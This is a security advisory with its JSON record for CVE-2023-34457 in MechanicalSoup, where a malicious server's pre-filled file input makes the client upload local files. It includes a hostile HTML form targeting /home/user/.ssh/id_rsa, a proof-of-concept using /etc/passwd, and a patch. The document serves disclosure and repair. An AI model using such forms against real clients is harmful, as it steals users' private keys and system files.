ghsa-x456-3ccm-m6j4
Vulnerability from github
Published: 2023-07-05 21:35
Modified: 2024-10-01 19:29
Summary
MechanicalSoup vulnerable to malicious web server reading arbitrary files on client using file input inside HTML form
Details

Summary

A malicious web server can read arbitrary files on the client using an <input type="file" ...> element inside an HTML form.

Details

This affects the extremely common pattern of form submission:

```python
b = mechanicalsoup.StatefulBrowser()
b.select_form(...)
b.submit_selected()
```

The problem is with the code in browser.Browser.get_request_kwargs:

```python
if tag.get("type", "").lower() == "file" and multipart:
    filepath = value
    if filepath != "" and isinstance(filepath, str):
        content = open(filepath, "rb")
    else:
        content = ""
    filename = os.path.basename(filepath)
    # If value is the empty string, we still pass it
    # for consistency with browsers (see
    # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).
    files[name] = (filename, content)
```

The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:

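```html
<html><body>
  <form method="post" enctype="multipart/form-data">
    <input type="text" name="greeting" value="hello" />
    <input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
  </form>
</body></html>
```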

then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.
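As a rough illustration of what makes such a page dangerous, the sketch below scans HTML for file inputs that arrive with a value already filled in by the server. It uses only the standard library; `PrefilledFileInputFinder` and `find_prefilled_file_inputs` are hypothetical names for this example and are not part of MechanicalSoup.

```python
from html.parser import HTMLParser


class PrefilledFileInputFinder(HTMLParser):
    """Collect <input type="file"> tags that carry a non-empty value."""

    def __init__(self):
        super().__init__()
        self.suspicious = []  # list of (name, value) pairs

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attributes = dict(attrs)
        input_type = (attributes.get("type") or "").lower()
        value = attributes.get("value") or ""
        if input_type == "file" and value:
            self.suspicious.append((attributes.get("name"), value))


def find_prefilled_file_inputs(html):
    """Return (name, value) for every file input the server pre-filled."""
    finder = PrefilledFileInputFinder()
    finder.feed(html)
    return finder.suspicious


page = """
<html><body>
  <form method="post" enctype="multipart/form-data">
    <input type="text" name="greeting" value="hello" />
    <input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
  </form>
</body></html>
"""

print(find_prefilled_file_inputs(page))
# prints [('evil', '/home/user/.ssh/id_rsa')]
```

A legitimate server has no reason to pre-fill a file input, so any hit from a check like this is worth treating as hostile.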

PoC

```python
import attr
import mechanicalsoup
import requests


class NevermindError(Exception):
    pass


@attr.s
class FakeSession:
    session = attr.ib()

    headers = property(lambda self: self.session.headers)

    def request(self, *args, **kwargs):
        print("requested", args, kwargs)
        raise NevermindError  # don't actually send request


def demonstrate(inputs=None):
    b = mechanicalsoup.StatefulBrowser(FakeSession(requests.Session()))
    b.open_fake_page("""\
<html><body>
<form method="post" enctype="multipart/form-data">
<input type="text" name="greeting" value="hello" />
<input type="file" name="evil" value="/etc/passwd" />
<input type="file" name="second" />
</form>
</body></html>
""", url="http://127.0.0.1:9/")
    b.select_form()
    if inputs is not None:
        b.form.set_input(inputs)
    try:
        b.submit_selected()
    except NevermindError:
        pass

# %%

# unpatched
demonstrate()
# OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('passwd', <_io.BufferedReader name='/etc/passwd'>), 'second': ('', '')}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hello')]}

# %%

# with the patch, this now works. users MUST open the file manually and
# use browser.set_input() using the file object.
demonstrate({"greeting": "hiya", "evil": open("/etc/hostname", "rb").name, "second": open("/dev/null", "rb")})
# OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('hostname', <_io.BufferedReader name='/etc/hostname'>), 'second': ('null', <_io.BufferedReader name='/dev/null'>)}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hiya')]}

# %%

# with the patch, this raises a ValueError with a helpful string
demonstrate({"evil": "/etc/hostname"})

# %%

# with the patch, we silently send no file if a malicious server tries the attack:
demonstrate()
```

Suggested patch

```diff
diff --git a/mechanicalsoup/browser.py b/mechanicalsoup/browser.py
index 285f8bb..68bc65e 100644
--- a/mechanicalsoup/browser.py
+++ b/mechanicalsoup/browser.py
@@ -1,7 +1,8 @@
+import io
 import os
 import tempfile
 import urllib
 import weakref
 import webbrowser
 
 import bs4
@@ -227,15 +228,21 @@ class Browser:
                     value = tag.get("value", "")
 
                 # If the enctype is not multipart, the filename is put in
                 # the form as a text input and the file is not sent.
                 if tag.get("type", "").lower() == "file" and multipart:
                     filepath = value
                     if filepath != "" and isinstance(filepath, str):
-                        content = open(filepath, "rb")
+                        content = getattr(tag, "_mechanicalsoup_file", None)
+                        if content is False:
+                            raise ValueError(
+                                """From v1.3.0 onwards, you must pass an open file object directly, for example using `form.set_input({"name": open("/path/to/filename", "rb")})`. This change is to mitigate a security vulnerability where a malicious web server could read arbitrary files from the client."""
+                            )
+                        elif not isinstance(content, io.IOBase):
+                            content = ""
                     else:
                         content = ""
                     filename = os.path.basename(filepath)
                     # If value is the empty string, we still pass it
                     # for consistency with browsers (see
                     # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).
                     files[name] = (filename, content)
diff --git a/mechanicalsoup/form.py b/mechanicalsoup/form.py
index a67195c..82f6015 100644
--- a/mechanicalsoup/form.py
+++ b/mechanicalsoup/form.py
@@ -1,8 +1,9 @@
 import copy
+import io
 import warnings
 
 from bs4 import BeautifulSoup
 
 from .utils import LinkNotFoundError
 
 
@@ -64,15 +65,24 @@ class Form:
         give it the value ``password``.
         """
 
         for (name, value) in data.items():
             i = self.form.find("input", {"name": name})
             if not i:
                 raise InvalidFormMethod("No input field named " + name)
-            i["value"] = value
+
+            if isinstance(value, io.IOBase):
+                # Store the actual file object for <input type="file">
+                i._mechanicalsoup_file = value
+                i["value"] = value.name
+            else:
+                # We set `_mechanicalsoup_file` to `False` so that we can
+                # check for deprecated use of the API.
+                i._mechanicalsoup_file = False
+                i["value"] = value
 
     def uncheck_all(self, name):
         """Remove the *checked*-attribute of all input elements with
         a *name*-attribute given by ``name``.
         """
         for option in self.form.find_all("input", {"name": name}):
             if "checked" in option.attrs:
@@ -257,20 +267,20 @@ class Form:
         .. code-block:: python
 
             form.set("login", username)
             form.set("password", password)
             form.set("eula-checkbox", True)
 
         Example: uploading a file through a ``<input type="file"
-        name="tagname">`` field (provide the path to the local file,
+        name="tagname">`` field (provide an open file object,
         and its content will be uploaded):
 
         .. code-block:: python
 
-            form.set("tagname", path_to_local_file)
+            form.set("tagname", open(path_to_local_file, "rb"))
 
         """
         for func in ("checkbox", "radio", "input", "textarea", "select"):
             try:
                 getattr(self, "set_" + func)({name: value})
                 return
             except InvalidFormMethod:
```
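The decision the patched branch makes for a single file field can be sketched as a standalone function. This is an illustration under assumptions, not the library's code: `resolve_file_field` is a hypothetical name, `attached` stands in for the `_mechanicalsoup_file` attribute from the diff above, and the error message is shortened.

```python
import io
import os


def resolve_file_field(value, attached):
    """Mimic the patched branch for one <input type="file"> field.

    value    -- the tag's "value" attribute (possibly server-supplied)
    attached -- what set_input() stored on the tag: a file object,
                False (a plain string was passed), or None (never set)
    """
    if value != "" and isinstance(value, str):
        if attached is False:
            # The caller passed a path string: the deprecated, unsafe usage.
            raise ValueError("pass an open file object, not a path")
        # Only a real file object is ever sent; anything else becomes "".
        content = attached if isinstance(attached, io.IOBase) else ""
    else:
        content = ""
    return os.path.basename(value), content


upload = io.BytesIO(b"hello")

# The user attached a file object: it is sent.
print(resolve_file_field("/tmp/report.txt", upload)[1] is upload)  # prints True

# The value came from the server and the user never set it: nothing is read.
print(resolve_file_field("/etc/passwd", None))  # prints ('passwd', '')
```

The point of the three-way split is that a path string alone is never enough to open a file: the content must come from an object the caller opened themselves.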

Impact

All users of MechanicalSoup's form submission are affected, unless they took very specific (and manual) steps to reset HTML form field values.
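To check whether an installed copy falls in the affected range recorded for this advisory (introduced in 0.2.0, fixed in 1.3.0), something like the following could be used. It is a minimal sketch: the helper names are hypothetical, and the version parsing is deliberately simplistic (it reads only the first three numeric components and ignores pre-release markers).

```python
import re
from importlib import metadata

INTRODUCED = (0, 2, 0)  # first affected release, per the advisory record
FIXED = (1, 3, 0)       # first release containing the fix


def parse_version(text):
    """Turn '1.2.1' into (1, 2, 1), padding short versions with zeros."""
    numbers = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(numbers + [0] * (3 - len(numbers)))


def is_affected(version_text):
    """True if the version lies in the range [INTRODUCED, FIXED)."""
    return INTRODUCED <= parse_version(version_text) < FIXED


def installed_version_is_affected(package="MechanicalSoup"):
    """Check the installed package; False if it is not installed."""
    try:
        return is_affected(metadata.version(package))
    except metadata.PackageNotFoundError:
        return False


print(is_affected("1.2.1"))  # prints True
print(is_affected("1.3.0"))  # prints False
```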



{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "MechanicalSoup"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.0"
            },
            {
              "fixed": "1.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-34457"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-05T21:35:54Z",
    "nvd_published_at": "2023-07-05T20:15:10Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA malicious web server can read arbitrary files on the client using a `\u003cinput type=\"file\" ...\u003e` inside HTML form.\n\n### Details\nThis affects the extremely common pattern of form submission:\n\n```python\nb = mechanicalsoup.StatefulBrowser()\nb.select_form(...)\nb.submit_selected()\n```\n\nThe problem is with the code in `browser.Browser.get_request_kwargs`:\n\n```python\n    if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n        filepath = value\n        if filepath != \"\" and isinstance(filepath, str):\n            content = open(filepath, \"rb\")\n        else:\n            content = \"\"\n        filename = os.path.basename(filepath)\n        # If value is the empty string, we still pass it\n        # for consistency with browsers (see\n        # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n        files[name] = (filename, content)\n```\n\nThe file path is taken from the bs4 tag \"value\" attribute. However, this path will default to whatever the server sends. 
So if a malicious web server were to send something like:\n\n```html\n\u003chtml\u003e\u003cbody\u003e\n  \u003cform method=\"post\" enctype=\"multipart/form-data\"\u003e\n    \u003cinput type=\"text\" name=\"greeting\" value=\"hello\" /\u003e\n    \u003cinput type=\"file\" name=\"evil\" value=\"/home/user/.ssh/id_rsa\" /\u003e\n  \u003c/form\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nthen upon `.submit_selected()` the mechanicalsoup browser will happily send over the contents of your SSH private key.\n\n### PoC\n\n```python\nimport attr\nimport mechanicalsoup\nimport requests\n\n\nclass NevermindError(Exception):\n    pass\n\n\n@attr.s\nclass FakeSession:\n    session = attr.ib()\n\n    headers = property(lambda self: self.session.headers)\n\n    def request(self, *args, **kwargs):\n        print(\"requested\", args, kwargs)\n        raise NevermindError  # don\u0027t actually send request\n\n\ndef demonstrate(inputs=None):\n    b = mechanicalsoup.StatefulBrowser(FakeSession(requests.Session()))\n    b.open_fake_page(\"\"\"\\\n\u003chtml\u003e\u003cbody\u003e\n\u003cform method=\"post\" enctype=\"multipart/form-data\"\u003e\n\u003cinput type=\"text\" name=\"greeting\" value=\"hello\" /\u003e\n\u003cinput type=\"file\" name=\"evil\" value=\"/etc/passwd\" /\u003e\n\u003cinput type=\"file\" name=\"second\" /\u003e\n\u003c/form\u003e\n\u003c/body\u003e\u003c/html\u003e\n\"\"\", url=\"http://127.0.0.1:9/\")\n    b.select_form()\n    if inputs is not None:\n        b.form.set_input(inputs)\n    try:\n        b.submit_selected()\n    except NevermindError:\n        pass\n\n# %%\n\n# unpatched\ndemonstrate()\n# OUTPUT: requested () {\u0027method\u0027: \u0027post\u0027, \u0027url\u0027: \u0027http://127.0.0.1:9/\u0027, \u0027files\u0027: {\u0027evil\u0027: (\u0027passwd\u0027, \u003c_io.BufferedReader name=\u0027/etc/passwd\u0027\u003e), \u0027second\u0027: (\u0027\u0027, \u0027\u0027)}, \u0027headers\u0027: {\u0027Referer\u0027: \u0027http://127.0.0.1:9/\u0027}, 
\u0027data\u0027: [(\u0027greeting\u0027, \u0027hello\u0027)]}\n\n# %%\n\n# with the patch, this now works. users MUST open the file manually and\n# use browser.set_input() using the file object.\ndemonstrate({\"greeting\": \"hiya\", \"evil\": open(\"/etc/hostname\", \"rb\").name, \"second\": open(\"/dev/null\", \"rb\")})\n# OUTPUT: requested () {\u0027method\u0027: \u0027post\u0027, \u0027url\u0027: \u0027http://127.0.0.1:9/\u0027, \u0027files\u0027: {\u0027evil\u0027: (\u0027hostname\u0027, \u003c_io.BufferedReader name=\u0027/etc/hostname\u0027\u003e), \u0027second\u0027: (\u0027null\u0027, \u003c_io.BufferedReader name=\u0027/dev/null\u0027\u003e)}, \u0027headers\u0027: {\u0027Referer\u0027: \u0027http://127.0.0.1:9/\u0027}, \u0027data\u0027: [(\u0027greeting\u0027, \u0027hiya\u0027)]}\n\n# %%\n\n# with the patch, this raises a ValueError with a helpful string\ndemonstrate({\"evil\": \"/etc/hostname\"})\n\n# %%\n\n# with the patch, we silently send no file if a malicious server tries the attack:\ndemonstrate()\n```\n\n### Suggested patch\n\n```diff\ndiff --git a/mechanicalsoup/browser.py b/mechanicalsoup/browser.py\nindex 285f8bb..68bc65e 100644\n--- a/mechanicalsoup/browser.py\n+++ b/mechanicalsoup/browser.py\n@@ -1,7 +1,8 @@\n+import io\n import os\n import tempfile\n import urllib\n import weakref\n import webbrowser\n \n import bs4\n@@ -227,15 +228,21 @@ class Browser:\n                     value = tag.get(\"value\", \"\")\n \n                 # If the enctype is not multipart, the filename is put in\n                 # the form as a text input and the file is not sent.\n                 if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n                     filepath = value\n                     if filepath != \"\" and isinstance(filepath, str):\n-                        content = open(filepath, \"rb\")\n+                        content = getattr(tag, \"_mechanicalsoup_file\", None)\n+                        if content is False:\n+              
              raise ValueError(\n+                                \"\"\"From v1.3.0 onwards, you must pass an open file object directly, for example using `form.set_input({\"name\": open(\"/path/to/filename\", \"rb\")})`. This change is to mitigate a security vulnerability where a malicious web server could read arbitrary files from the client.\"\"\"\n+                            )\n+                        elif not isinstance(content, io.IOBase):\n+                            content = \"\"\n                     else:\n                         content = \"\"\n                     filename = os.path.basename(filepath)\n                     # If value is the empty string, we still pass it\n                     # for consistency with browsers (see\n                     # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n                     files[name] = (filename, content)\ndiff --git a/mechanicalsoup/form.py b/mechanicalsoup/form.py\nindex a67195c..82f6015 100644\n--- a/mechanicalsoup/form.py\n+++ b/mechanicalsoup/form.py\n@@ -1,8 +1,9 @@\n import copy\n+import io\n import warnings\n \n from bs4 import BeautifulSoup\n \n from .utils import LinkNotFoundError\n \n \n@@ -64,15 +65,24 @@ class Form:\n         give it the value ``password``.\n         \"\"\"\n \n         for (name, value) in data.items():\n             i = self.form.find(\"input\", {\"name\": name})\n             if not i:\n                 raise InvalidFormMethod(\"No input field named \" + name)\n-            i[\"value\"] = value\n+\n+            if isinstance(value, io.IOBase):\n+                # Store the actual file object for \u003cinput type=\"file\"\u003e\n+                i._mechanicalsoup_file = value\n+                i[\"value\"] = value.name\n+            else:\n+                # We set `_mechanicalsoup_file` to `False` so that we can\n+                # check for deprecated use of the API.\n+                i._mechanicalsoup_file = False\n+                i[\"value\"] = 
value\n \n     def uncheck_all(self, name):\n         \"\"\"Remove the *checked*-attribute of all input elements with\n         a *name*-attribute given by ``name``.\n         \"\"\"\n         for option in self.form.find_all(\"input\", {\"name\": name}):\n             if \"checked\" in option.attrs:\n@@ -257,20 +267,20 @@ class Form:\n         .. code-block:: python\n \n             form.set(\"login\", username)\n             form.set(\"password\", password)\n             form.set(\"eula-checkbox\", True)\n \n         Example: uploading a file through a ``\u003cinput type=\"file\"\n-        name=\"tagname\"\u003e`` field (provide the path to the local file,\n+        name=\"tagname\"\u003e`` field (provide an open file object,\n         and its content will be uploaded):\n \n         .. code-block:: python\n \n-            form.set(\"tagname\", path_to_local_file)\n+            form.set(\"tagname\", open(path_to_local_file, \"rb\"))\n \n         \"\"\"\n         for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n             try:\n                 getattr(self, \"set_\" + func)({name: value})\n                 return\n             except InvalidFormMethod:\n```\n\n### Impact\n\nAll users of MechanicalSoup\u0027s form submission are affected, unless they took very specific (and manual) steps to reset HTML form field values.",
  "id": "GHSA-x456-3ccm-m6j4",
  "modified": "2024-10-01T19:29:06Z",
  "published": "2023-07-05T21:35:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup/security/advisories/GHSA-x456-3ccm-m6j4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34457"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup/commit/d57c4a269bba3b9a0c5bfa20292955b849006d9e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup/releases/tag/v1.3.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mechanicalsoup/PYSEC-2023-108.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "MechanicalSoup vulnerable to malicious web server reading arbitrary files on client using file input inside HTML form"
}

